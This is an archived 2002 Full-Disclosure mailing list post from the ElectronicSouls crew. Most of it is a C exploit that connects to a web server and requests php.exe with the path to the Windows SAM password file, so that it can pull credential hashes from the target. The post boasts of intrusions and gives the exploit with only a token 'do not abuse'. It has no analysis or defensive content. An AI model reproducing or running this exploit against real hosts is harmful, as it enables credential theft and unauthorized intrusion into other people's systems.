| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <200211292053.gATKrPFR084354@mailserver3.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - 0day PHP Exploit
-----BEGIN PGP SIGNED MESSAGE-----
Dear List,
Here is an exploit for a now-known bug in php. Do not abuse!@#
# cat ES-php-windoze.c
/*
* PROPERTY OF THE ELECTRONICSOULS CREW !
* DO NOT DISTRIBUTE WITHOUT PERMISSION !
*
* (C) BrainStorm - 2k2
*
*
* quick shoutz: SectorX,ghQst,RobBbot,it_fresh
* FreQ,BuRn-X,0x90,roc..and all other ES members !!
*
*/
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#define GREEN "\033[01;32m"
#define RED "\033[01;31m"
#define NORM "\033[00;00m"
#define BOLD "\033[00;01m"
int main(int argc, char **argv[])
{
struct sockaddr_in sin;
struct hostent *host;
char buf[8192];
int sock,
ES,
len;
if (argc != 2)
{
printf("\n*** (C) ElectronicSouls *** \n\n * Usage: %s <host> \n",argv[0]);
exit(0);
}
host = gethostbyname((void *)argv[1]);
sock = socket(AF_INET, SOCK_STREAM, 0);
bzero(&(sin.sin_zero), 8);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = htonl(INADDR_ANY);
sin.sin_addr.s_addr = ((struct in_addr *)(host->h_addr))->s_addr;
sin.sin_port = htons(80);
ES = connect(sock, (void *)&sin, sizeof(sin));
if (ES == -1)
{
perror(RED"[*] Connecting..");
printf(NORM"\n");
exit(1);
}
printf(GREEN"\n\n[ ElectronicSouls ] - php.exe remote exploit\n");
printf(GREEN"(C) BrainStorm - 2002 \n\n");
printf(RED"[*] Connected to %s\n"NORM, argv[1]);
memset(&buf, 0, sizeof(buf));
sprintf(buf, "GET /php/php.exe?c:\winnt\repair\sam HTTP/1.0\n\n", argv[1]);
printf(GREEN"[*] Sending exploit string..\n"NORM, argv[1]);
send(sock, buf, sizeof(buf), 0);
while (1)
{
memset(&buf, 0, sizeof(buf));
len = sizeof(buf);
ES = read(sock, &buf, len);
if (ES <= 0)
exit(0);
printf(BOLD"%s\n"NORM, buf);
perror("Status");
}
printf(NORM"\n");
}
#
The Electronic Souls Crew
[ElectronicSouls] (c) 2002
"Responsible for all Project Honeynet Intrusions."
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wlMEARECABMFAj3n09gMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltfNUAn39Jnl1zHMvb
Q3niwEddPjdBK8yrAJ47Kg17dso8hCNGXOhtX9NqkQqhIw==
=Yxss
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
Powered by blists - more mailing lists